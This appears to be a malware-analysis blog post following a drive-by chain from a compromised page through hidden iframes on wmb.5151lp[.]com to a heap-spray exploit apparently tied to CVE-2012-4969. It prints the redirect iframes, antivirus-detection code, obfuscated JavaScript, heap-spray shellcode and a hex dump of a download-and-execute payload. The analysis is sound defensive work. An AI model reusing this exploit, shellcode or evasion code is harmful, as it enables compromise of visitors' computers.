The Redirection
After fetching the content of 8ace3ds3f4fb.html, I concentrate myself on the portion that might contains malicious embedded code (such as redirection/iframe/javascript). And yes, it have some javascript embedded, but the one that I'm interested in, is index.js
...
Snip
...
</BODY></HTML><script src="hxxp://s11.cnzz[.]com/stat.php?id=4581253&web_id=4581253" language="JavaScript"></script>
<script type="text/javascript" src="index.js" ></script>
Looking into index.js, the code contains an iframe to another URL, hxxp://wmb.5151lp[.]com/kk.html
var bOwa = navigator.userAgent.toLowerCase();
try {
var s;
var ss=new ActiveXObject("\x33\x36\x30\x53\x61\x66\x65\x4C"+"\x69\x76\x65\x2E"+"\x55\x70\x64\x61\x74\x65");
}
catch(s){};
finally {
if((s=="[object Error]") && (bOwa.indexOf("360se")==-1) && (bOwa.indexOf("msie 9")==-1)) {
document.write("<iframe src=hxxp://wmb.5151lp[.]com/kk.html width=116 height=1></iframe>");
}
}
From hxxp://wmb.5151lp[.]com/kk.html, I get an obfuscated JS code (PASTEBIN).
<script>var ckabc=eval;try{alert(a,b,c);}catch(e){ckabc(function(/*ck vip*/p,/*ck vip*/a,/*ck vip*/c,/*ck vip*/k,/*ck vip*/e,/*ck vip*/d/*ck vip*/){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];
...
(t);',62,216,'||||||||||var|out||str||len|charCodeAt|case||length||return|if||c3|||c4|||0xff|||while|||break|sum|c2|String|fromCharCode|nbChar|0xffffffff|63||function|char2|mx|c1||AVgHbu2f|do|X3cQCMIIF|||ErTiUlaxlkP|delta|char3|6b|join|0x3F|BMOYPRD4H|||||||||||str2long|for|61|vl|74|65|key|nbencode|52|GIEMslIELDjE|nbcode|NtCion|utf8to16|long2str|sl|false|MYKEY|57|62|Array|53|55|54|
...
|8LtGCo1KTBLkuLxBQxwKwUi0hC9WGI30Ll3WuvTUI2lqsUhOFxzclRfbQgCTIwjifli1q|||||||||||AJvzvYnS37tvhGB0Q8wXKpaJI|HplD80sXTFEoEZ|DPwUqt|2V8ivu9Y13m9nqQSg8rN|fOvmYQvkBXXNmtdcp7swtEf6WWz8DKZ5FULCIY9SUbv2qHZHT3fYj9E7M8wQ6gSsDCLMmkMo3TAyosj3rGqkCnNzuPymVGb9|GguYcZXhH8iz4CLJQrAcSJovghxKiIzXzUyiHyMDzW4N7wNEOE9oVabADxVEkSCC0cqxefhZiOzzebb1sFukgfgdohewLv90P|window|43|IJGbt5Bd8HhsU982|Um6ZS0Ntts|YcoQQAxsZ5TtTZ0Vm6RZ8qIMdPieVQjLVQaG6ZqLBuzR33p|JzznFVHaUz4kVs38VjlAmdjYoGQYyUVycKOS|8itFIvCwP1Fq7AzILaHEyt9sVB8DPZBl|Vb0VwMO|kn0|D20GWWbGli3C9wTOHftmKvHHjBalZiqDWrBLST4jp|HZfPtBoR|AxvlyDenPYzIKN|SCYZ7|eS5av9AYyYaMB7ZkK8JRp50jBCFQRm8XSZJvJkDhtbGs7B9jYByhTaX'.split('|'),0,{}))}</script>
When it comes to obfuscated JS code, I've been using manual analysis + spidermonkey since from the beginning. After finding out about JSDetox for a few weeks, and I must say, manual analysis with JSDetox has become quite handy sometimes, especially when manually tracking variable values, and deobfuscating JS code on DOM level.
The obfuscated code above has multiple obfuscation, but with JSDetox I utilize the "Send to Analyze" and execute one more time. And from there, I get deobfuscated JS code (PASTEBIN) with an Iframe to cc.html. Along with Iframe, it also tries to check whether ksafe, kingsoft antivirus, 360QBack, 360safe and NODE32 are installed, and not other major AV, I have no idea why, I suspect they're trying to check whether fake AV is installed.
function ckrav(){
var EasGXqAf1 = ['res://C:\\Program%20Files\\ksafe\\ksafevulfix.exe/BMP/100', 'res://D:\\Program%20Files\\ksafe\\ksafevulfix.exe/BMP/100', 'res://E:\\Program%20Files\\ksafe\\ksafevulfix.exe/BMP/100', 'res://F:\\Program%20Files\\ksafe\\ksafevulfix.exe/BMP/100', 'res://C:\\Program%20Files\\kingsoft\\kingsoft%20antivirus\\krecycle.exe/PNG/308', 'res://D:\\Program%20Files\\kingsoft\\kingsoft%20antivirus\\krecycle.exe/PNG/308', 'res://E:\\Program%20Files\\kingsoft\\kingsoft%20antivirus\\krecycle.exe/PNG/308', 'res://F:\\Program%20Files\\kingsoft\\kingsoft%20antivirus\\krecycle.exe/PNG/308', 'res://C:\\Program%20Files\\360\\360SD\\360QBack.exe/GIF/133', 'res://D:\\Program%20Files\\360\\360SD\\360QBack.exe/GIF/133', 'res://E:\\Program%20Files\\360\\360SD\\360QBack.exe/GIF/133', 'res://F:\\Program%20Files\\360\\360SD\\360QBack.exe/GIF/133', 'res://C:\\Program%20Files\\ESET\\ESET%20NOD32%20Antivirus\\SysRescue.exe/GIF/1102', 'res://D:\\Program%20Files\\ESET\\ESET%20NOD32%20Antivirus\\SysRescue.exe/GIF/1102', 'res://E:\\Program%20Files\\ESET\\ESET%20NOD32%20Antivirus\\SysRescue.exe/GIF/1102', 'res://F:\\Program%20Files\\ESET\\ESET%20NOD32%20Antivirus\\SysRescue.exe/GIF/1102', 'res://C:\\Program%20Files\\360\\360safe\\360Diagnose.exe/GIF/171', 'res://D:\\Program%20Files\\360\\360safe\\360Diagnose.exe/GIF/171', 'res://E:\\Program%20Files\\360\\360safe\\360Diagnose.exe/GIF/171', 'res://F:\\Program%20Files\\360\\360safe\\360Diagnose.exe/GIF/171'];
for(i = 0; i < EasGXqAf1["length"]; i++) {
ischeck = 1;
x = new Image();
x["src"] = "";
x["onerror"] = function() {
ischeck = 0;
};
x["src"] = EasGXqAf1[i];
if(ischeck == 1) {
return 1;
}
delete x;
}
return 0;
}
if(!ckrav()) {
document.write("<iframe src=cc.html width=116 height=1></iframe>");
}
Following the content of hxxp://wmb.5151lp[.]com/cc.html, thecode contains another Iframe which is ppp.html and external JS code from 51.la URL. I've actually read about 51la malware previously on Donovan's blog post but I still don't get what it (the 51la malware) actually do. However, according to his latest post, Norman Lab has confirmed about its maliciousness.
Below are the content from cc.html;
<script language="JavaScript">
function lovexckwm(){
var ckxo = navigator.userAgent.toLowerCase();
var polo = new String(document.cookie);
var colo = "ck006=";
var cksun = polo.indexOf(colo);
if (cksun == -1)
{
var osome = new Date();
osome.setTime(osome.getTime()+1*60*60*1000);
document.cookie = "ck006=yes;expires=" + osome.toGMTString();
if(ckxo.indexOf("msie")>0)
{
document.write("<iframe src=ppp.html width=60 height=1></iframe>");
}
}
}
lovexckwm();
</script>
<script language="javascript" type="text/javascript" src="http://js.users.51[.]la/14908642.js"></script>
The Exploitation
I downloaded the ppp.html and 14908642.js from both URL inside cc.html.
From the content of 14908642.js (PASTEBIN), it somehow similar with Donovan's blogpost which came to our suspicion that why the <img> has an .asp extension in its src option.
Moving to ppp.html, I get an heavily obfuscated JS code which I then manually analyzed with JSDetox to strip the script from HTML tag (beautified version in PASTEBIN). With the beautified version, I identified 2 parts from the content, (1) an obfuscation using packed function, (2) heaplib exploitation library developed by Alexander Sotirov.
The Shellcode
Since the heaplib.js require shellcode to deliver the payload, I'm pretty sure it reside on the part of obfuscated code. By deobfuscating the first part of the code (PASTEBIN), I managed to see obfuscated shellcode with another heaplib exploitation library.
From there, I deobfuscate the shellcode and got;
<script>
function ckckckckckckckck(__){var _='';for(var ___=0;___<__['length'];___+=4){_+='cgTw6'+__.substr(___,4);} return _;}
var x1 = new Array, x2 = '', x3;
for(var i=0;i<ss.length;i++ ){x1[i]=ss[i]-38;x2+=x1[i].toString(16);}
x3 = ckckckckckckckck(x2);
var Abqj6 = '%'+'u';
var ckwmckwm = Abqj6+'90'+'90'+Abqj6+'90'+'90'+Abqj6+'5858'+'cgTw65858cgTw610EBcgTw64B5BcgTw6C933cgTw6B966cgTw603B8cgTw63480cgTw6BD0BcgTw6FAE2cgTw605EBcgTw6EBE8'+'cgTw6FFFF'+Abqj6+'54FFcgTw6BEA3'+'cgTw6bdbdcgTw6D9E2'+'cgTw68D1CcgTw6BDBDcgTw636BDcgTw6B1FDcgTw6CD36cgTw610A1cgTw6D536'+'cgTw636B5cgTw6D74AcgTw6E4ACcgTw60355cgTw6BDBF'+'cgTw62DBDcgTw6455F'+'cgTw68ED5'+'cgTw6'+'BD8F'+'cgTw6D5BDcgTw6CEE8cgTw6CFD8cgTw636E9cgTw6B1FBcgTw60355cgTw6BDBCcgTw636BDcgTw6D755cgTw6E4B8cgTw62355'+'cgTw6BDBF'+'cgTw65FBDcgTw6D544cgTw6D3D2cgTw6BDBDcgTw6C8D5cgTw6D1CFcgTw6E9D0cgTw6AB42cgTw67D38cgTw6AEC8cgTw6D2D5cgTw6BDD3cgTw6D5BDcgTw6CFC8cgTw6D0D1cgTw636E9cgTw6B1FBcgTw63355cgTw6BDBCcgTw636BDcgTw6D755cgTw6E4BCcgTw6D355cgTw6BDBFcgTw65FBDcgTw6D544'+'cgTw68ED1'+'cgTw6BD8FcgTw6CED5cgTw6D8D5'+Abqj6+'E9D1cgTw6FB36cgTw655B1cgTw6BCD2cgTw6BDBDcgTw65536cgTw6BCD7cgTw655E4cgTw6BFF2cgTw6BDBDcgTw6445FcgTw6513CcgTw6BCBDcgTw6BDBDcgTw66136cgTw67E3CcgTw6BD3DcgTw6BDBDcgTw6BDD7cgTw6A7D7cgTw6D7EEcgTw642BDcgTw6E1EBcgTw67D8EcgTw63DFDcgTw6BE81'+'cgTw6C8BD'+'cgTw67A44cgTw6BEB9cgTw6D6E1cgTw6D893cgTw6F97AcgTw6B9BEcgTw6D8C5cgTw6BDBDcgTw6748EcgTw6ECECcgTw6EAEEcgTw68EECcgTw6367DcgTw6E5FBcgTw69F55cgTw6BDBCcgTw63EBDcgTw6BD45cgTw638B2cgTw6BD68cgTw6BDBDcgTw6BDD7cgTw6BDD7cgTw6BED7cgTw6BDD7cgTw6BFD7cgTw6BDD5cgTw6BDBDcgTw6EE7DcgTw6FB36cgTw65599cgTw6BCBCcgTw6BDBDcgTw6FB34cgTw6D7DDcgTw6EDBDcgTw6EB42cgTw63495cgTw6D9FBcgTw6FB36cgTw6D7DDcgTw6D7BDcgTw6D7BDcgTw6D7BDcgTw6D7B9cgTw6EDBDcgTw6EB42cgTw6D791cgTw6D7BDcgTw6D7BDcgTw6D5BDcgTw6BDA2cgTw6BDB2cgTw642EDcgTw681EBcgTw6FB34cgTw636C5cgTw6D9F3cgTw6C13DcgTw642B5cgTw6C91FcgTw63DB1cgTw6B5C1'+'cgTw6BD42'+'cgTw6B8C9'+'cgTw6C93DcgTw642B5'+'cgTw65F1F'+'cgTw63456'+'cgTw63D3BcgTw6BDBDcgTw67ABDcgTw6CDFBcgTw6BDBDcgTw6BDBDcgTw6FB7AcgTw6BDC9cgTw6BDBDcgTw6D7BDcgTw6D7BDcgTw6D7BDcgTw636BDcgTw6DDFBcgTw642EDcgTw685EBcgTw63B36cgTw6BD3DcgTw6BDBDcgTw6BDD7cgTw6F330cgTw6ECC9cgTw6CB42cgTw6EDCDcgTw6CB42cgTw642DDcgTw68DEBcgTw6CB42'+'cgTw642DDcgTw689EBcgTw6CB42cgTw642C5cgTw6FDEBcgTw64636cgTw67D8EcgTw6668EcgTw6513CcgTw6BFBDcgTw6BDBDcgTw67136cgTw6453EcgTw6C0E9cgTw634B5cgTw6BCA1cgTw67D3EcgTw656B9cgTw6364EcgTw63671cgTw63E64cgTw6AD7EcgTw67D8EcgTw6ECEDcgTw6EDEEcgTw6EDEDcgTw6EDED'+'cgTw6EAED'+'cgTw6EDEDcgTw6EB42cgTw636B5cgTw6E9C3cgTw6AD55cgTw6BDBCcgTw655BDcgTw6BDD8cgTw6BDBDcgTw6DED5cgTw6CACBcgTw6D5BDcgTw6D5CEcgTw6D2D9cgTw636E9cgTw6B1FBcgTw69955cgTw6BDBDcgTw634BDcgTw681FBcgTw61CD9cgTw6BDB9cgTw6BDBDcgTw61D30cgTw642DDcgTw64242cgTw6D8D7cgTw6CB42cgTw63681cgTw6ADFBcgTw6B555cgTw6BDBD'+'cgTw68EBDcgTw6EE66cgTw6EEEEcgTw642EEcgTw63D6DcgTw65585cgTw6853DcgTw6C854cgTw63CACcgTw6B8C5cgTw62D2DcgTw62D2DcgTw6B5C9cgTw64236cgTw636E8cgTw63051cgTw6B8FDcgTw65D42cgTw61B55cgTw6BDBDcgTw67EBDcgTw61D55cgTw6BDBDcgTw605BDcgTw6BCACcgTw63DB9cgTw6B17FcgTw655BD'+'cgTw6BD2EcgTw6BDBDcgTw6513CcgTw6BCBDcgTw6BDBDcgTw64136cgTw67A3EcgTw67AB9cgTw68FBAcgTw62CC9cgTw67AB1cgTw6B9FAcgTw634DEcgTw6F26CcgTw6FA7AcgTw61DB5cgTw62AD8cgTw67A76cgTw6B1FAcgTw6FDECcgTw6C207cgTw6FA7AcgTw683ADcgTw60BA0cgTw67A84'+Abqj6+'A9FAcgTw6D405'+'cgTw6A669cgTw6FA7AcgTw603A5cgTw6DBC2cgTw67A1DcgTw6A1FAcgTw61441cgTw6108AcgTw6FA7AcgTw6259DcgTw6ADB7cgTw6D945cgTw68D1CcgTw6BDBDcgTw636BDcgTw6B1FDcgTw6CD36cgTw610A1cgTw6D536cgTw636B5cgTw6D74AcgTw6E4B9cgTw6E955cgTw6BDBDcgTw62DBDcgTw6455FcgTw68ED5'+'cgTw6BD8FcgTw6D5BDcgTw6CEE8cgTw6CFD8cgTw636E9cgTw655BBcgTw642E8cgTw64242cgTw65536cgTw6B8D7cgTw655E4cgTw6BD88cgTw6BDBDcgTw6445FcgTw6428EcgTw642EAcgTw6B9EBcgTw6BF56cgTw67EE5cgTw64455cgTw64242cgTw6E642cgTw6BA7BcgTw63405cgTw6BCE2cgTw67ADBcgTw6B8FAcgTw65D42cgTw6EE7EcgTw66136cgTw6D7EEcgTw6D5FDcgTw6ADBDcgTw6BDBDcgTw636EA'+'cgTw69DFBcgTw6A555cgTw64242cgTw6E542cgTw6EC7EcgTw636EBcgTw681C8cgTw6C936cgTw6C593cgTw648BEcgTw636EBcgTw69DCBcgTw648BEcgTw6748EcgTw6FCF4cgTw6BE10cgTw68E78cgTw6B266'+'cgTw6AD03cgTw66B87cgTw6B5C9cgTw6767CcgTw6BEBAcgTw6FD67cgTw64C56cgTw6A286cgTw65AC8cgTw636E3cgTw699E3cgTw660BEcgTw636DBcgTw6F6B1cgTw6E336cgTw6BEA1cgTw63660cgTw636B9cgTw678BEcgTw6E316cgTw67EE4cgTw66055cgTw64241cgTw60F42cgTw65F4FcgTw68449'+'cgTw6C05FcgTw6673EcgTw6C6F5cgTw68F80cgTw62CC9cgTw638B1cgTw61262cgTw6DE06cgTw66C34cgTw6ECF2cgTw607FDcgTw61DC2cgTw62AD8cgTw6A376cgTw6D919cgTw62E52cgTw6598FcgTw63329cgTw6B7AEcgTw67F11cgTw6F6A4cgTw679BCcgTw6A230cgTw6EAC9cgTw6B0DBcgTw6FE42cgTw61103'+'cgTw6C066cgTw6184DcgTw6EF27cgTw61A43cgTw68367cgTw60BA0cgTw60584'+Abqj6+'69D4cgTw603A6cgTw6DBC2cgTw6411DcgTw68A14cgTw62510cgTw6ADB7cgTw63D45cgTw6126BcgTw64627'+Abqj6+'A8EE'+x3+'cgTw6C3C3';
var code = unescape(ckwmckwm.replace(/cgTw6/g,Abqj6));
var nops = unescape("%"+"u0c0"+"c"+"%"+"u0c0"+"c");
var nops_90 = unescape("%"+"ub3d6"+"%"+"u4f92");
while (nops.length < 0x80000) nops += nops;
while (nops_90.length < 0x80000) nops_90 += nops_90;
var offset = nops.substring(0, 0x100);
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
The shellcode somehow encoded with XOR. By using malzilla, I manage to get the XOR key, which is "BD". From there, it is a normal payload to download and execute ttxz.txt from the same server. The name implies that we are dealing with a text file, but in fact it is a data file.
00000000 2d 2d 2d 2d e5 e5 e5 e5 56 ad e6 f6 8e 74 db 04 |----....V....t..| 00000010 05 be 3d 89 b6 00 5f 47 56 b8 55 56 42 42 42 e9 |..=..._GV.UVBBB.| 00000020 1e 03 00 00 5f 64 a1 30 00 00 00 8b 40 0c 8b 70 |...._d.0....@..p| 00000030 1c ad 8b 68 08 8b f7 6a 11 59 e8 be 02 00 00 90 |...h...j.Y......| 00000040 e2 f8 68 33 32 00 00 68 55 73 65 72 54 8b 46 0c |..h32..hUserT.F.| 00000050 e8 be 01 00 00 8b e8 6a 05 59 e8 9e 02 00 00 e2 |.......j.Y......| 00000060 f9 68 6f 6e 00 00 68 75 72 6c 6d 54 ff 16 85 c0 |.hon..hurlmT....| 00000070 75 13 68 6f 6e 00 00 68 75 72 6c 6d 54 8b 46 0c |u.hon..hurlmT.F.| 00000080 e8 8e 01 00 00 8b e8 6a 01 59 e8 6e 02 00 00 e2 |.......j.Y.n....| 00000090 f9 68 6c 33 32 00 68 73 68 65 6c 54 8b 46 0c e8 |.hl32.hshelT.F..| 000000a0 6f 01 00 00 8b e8 6a 01 59 e8 4f 02 00 00 e2 f9 |o.....j.Y.O.....| 000000b0 81 ec 00 01 00 00 8b dc 81 c3 80 00 00 00 6a 00 |..............j.| 000000c0 6a 1a 53 6a 00 ff 56 5c 33 c0 40 80 3c 03 00 75 |j.Sj..V\3.@.<..u| 000000d0 f9 c7 04 03 5c 6b 2e 65 c7 44 03 04 78 65 00 00 |....\k.e.D..xe..| 000000e0 33 c9 51 51 53 57 51 33 c0 8b 46 58 e8 22 01 00 |3.QQSWQ3..FX."..| 000000f0 00 83 f8 00 0f 85 d5 00 00 00 6a 00 6a 00 6a 03 |..........j.j.j.| 00000100 6a 00 6a 02 68 00 00 00 c0 53 8b 46 24 e8 01 01 |j.j.h....S.F$...| 00000110 00 00 89 46 60 6a 00 50 ff 56 28 89 46 64 8b 46 |...F`j.P.V(.Fd.F| 00000120 60 6a 00 6a 00 6a 00 6a 04 6a 00 50 ff 56 2c 6a |`j.j.j.j.j.P.V,j| 00000130 00 6a 00 6a 00 68 1f 00 0f 00 50 ff 56 3c 89 46 |.j.j.h....P.V<.F| 00000140 78 8b 4e 64 80 7c 08 ff a2 74 0c 80 7c 08 ff 00 |x.Nd.|...t..|...| 00000150 74 05 80 74 08 ff a2 e2 eb 89 86 80 00 00 00 c7 |t..t............| 00000160 46 70 00 00 00 00 c7 46 74 00 00 00 00 6a 00 6a |Fp.....Ft....j.j| 00000170 00 6a 00 8b 46 60 50 ff 56 38 8b 86 80 00 00 00 |.j..F`P.V8......| 00000180 6a 00 8d 4e 74 51 ff 76 70 50 ff 76 60 ff 56 30 |j..NtQ.vpP.v`.V0| 00000190 ff 76 60 ff 56 34 ff 76 78 ff 56 40 8b fb 33 c0 |.v`.V4.vx.V@..3.| 000001a0 33 db 81 ec 00 02 00 00 8b cc 83 f8 54 7d 08 89 |3...........T}..| 000001b0 1c 01 83 c0 04 eb f3 8b cc 8b d9 83 c3 10 33 c0 |..............3.| 000001c0 50 51 53 50 50 50 50 50 50 57 50 50 ff 56 08 8b |PQSPPPPPPWPP.V..| 000001d0 7e 54 e8 10 01 00 00 e8 65 00 00 00 68 63 76 77 |~T......e...hcvw| 000001e0 00 68 73 68 64 6f 54 8b 46 0c e8 24 00 00 00 89 |.hshdoT.F..$....| 000001f0 46 3c 64 a1 04 00 00 00 8d a0 60 ff ff ff 6a 65 |F<d.......`...je| 00000200 ff 76 3c 8b 46 10 e8 08 00 00 00 33 db 53 53 53 |.v<.F......3.SSS| 00000210 53 ff d0 80 38 e8 80 38 e9 75 11 81 78 05 90 90 |S...8..8.u..x...| 00000220 90 90 74 08 8b ff 55 8b ec 8d 40 05 ff e0 e8 a6 |..t...U...@.....| 00000230 00 00 00 c3 e8 a0 00 00 00 b8 11 01 04 80 c2 0c |................| 00000240 00 e8 93 00 00 00 81 ec 00 01 00 00 8b fc 83 c7 |................| 00000250 04 c7 07 32 74 91 0c c7 47 04 63 89 d1 4f c7 47 |...2t...G.c..O.G| 00000260 08 a0 65 97 cb c7 47 0c 51 40 ba 7f c7 47 10 3e |..e...G.Q@...G.>| 00000270 1d b6 39 c7 47 14 b8 69 d4 1b c7 47 18 be 7f 66 |..9.G..i...G...f| 00000280 a0 c7 47 1c fc a9 37 ad c7 47 20 98 0a 10 f8 64 |..G...7..G ....d| 00000290 a1 30 00 00 00 8b 40 0c 8b 70 1c ad 8b 68 08 8b |.0....@..p...h..| 000002a0 f7 6a 04 59 e8 54 00 00 00 90 e2 f8 68 33 32 00 |.j.Y.T......h32.| 000002b0 00 68 55 73 65 72 54 8b 06 e8 55 ff ff ff 8b e8 |.hUserT...U.....|000002c0 6a 05 59 e8 35 00 00 00 e2 f9 33 ff 57 ff 56 04 |j.Y.5.....3.W.V.| 000002d0 eb 02 58 c3 e8 f9 ff ff ff 5b c6 07 b8 89 5f 01 |..X......[...._.| 000002e0 66 c7 47 05 ff e0 c3 53 8b dc 53 6a 40 68 00 10 |f.G....S..Sj@h..| 000002f0 00 00 57 8b 46 20 e8 18 ff ff ff 58 c3 51 56 8b |..W.F .....X.QV.| 00000300 75 3c 8b 74 2e 78 03 f5 56 8b 76 20 03 f5 33 c9 |u<.t.x..V.v ..3.| 00000310 49 41 ad 03 c5 33 db 0f be 10 3a d6 74 08 c1 cb |IA...3....:.t...| 00000320 07 03 da 40 eb f1 3b 1f 75 e7 5e 8b 5e 24 03 dd |...@..;.u.^.^$..| 00000330 66 8b 0c 4b 8b 5e 1c 03 dd 8b 04 8b 03 c5 ab 5e |f..K.^.........^| 00000340 59 c3 e8 dd fc ff ff b2 f2 e2 f4 39 e2 7d 83 da |Y..........9.}..| 00000350 48 7b 3d 32 74 91 0c 85 df af bb 63 89 d1 4f 51 |H{=2t......c..OQ| 00000360 40 ba 7f a0 65 97 cb 1e a4 64 ef 93 32 e4 94 8e |@...e....d..2...| 00000370 13 0a ac c2 19 4b 01 c4 8d 1f 74 57 66 0d ff 43 |.....K....tWf..C| 00000380 be ac db 7d f0 a5 9a 52 fe a7 da 3e 1d b6 39 b8 |...}...R...>..9.| 00000390 69 d4 1b be 7f 66 a0 fc a9 37 ad 98 0a 10 f8 80 |i....f...7......| 000003a0 d6 af 9a fb 53 15 66 68 74 74 70 3a 2f 2f 77 6d |....S.fhttp://wm| 000003b0 62 2e 35 31 35 31 6c 70 2e 63 6f 6d 2f 74 74 78 |b.5151lp[.]com/ttx| 000003c0 7a 2e 74 78 74 00 7e 7e |z.txt.~~|
The Binary
I manage to get the binary. However, I'm a bit confused as the binary seems not to be a valid windows executable format, and it won't execute in sandbox. I sent the sample to VT which resulted 0/0 (https://www.virustotal.com/file/7b46896e5d6113b472fbf3ca95bcd2139671de480e2c4dbf165b21ef0dde055a/analysis/)
If any of you readers would like to have the sample for further analysis, just ping me and I would love to share the sample, and feel free to share any findings from that if you have.
Conclusion
From the analysis, and some other research, I've a verdict that this exploitation have got to do with CVE-2012-4969 vulnerability. The source of <img> tag which assign as 51.la URL might have return the value of "YMjf\u0c08\u0c0cKDogjsiIejengNEkoPDjfiJDIWUAzdfghjAAuUFGGBSIPPPUDFJKSOQJGH" to exploit CMshtmlEd::Exec function in mshtml.dll in Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code.
As for the binary itself, it is not the final payload to deliver to the users. With its filesize of 8.0KB, it might be used as an intermediary to download another binary to install on users computer.
That's it for now, bye bye.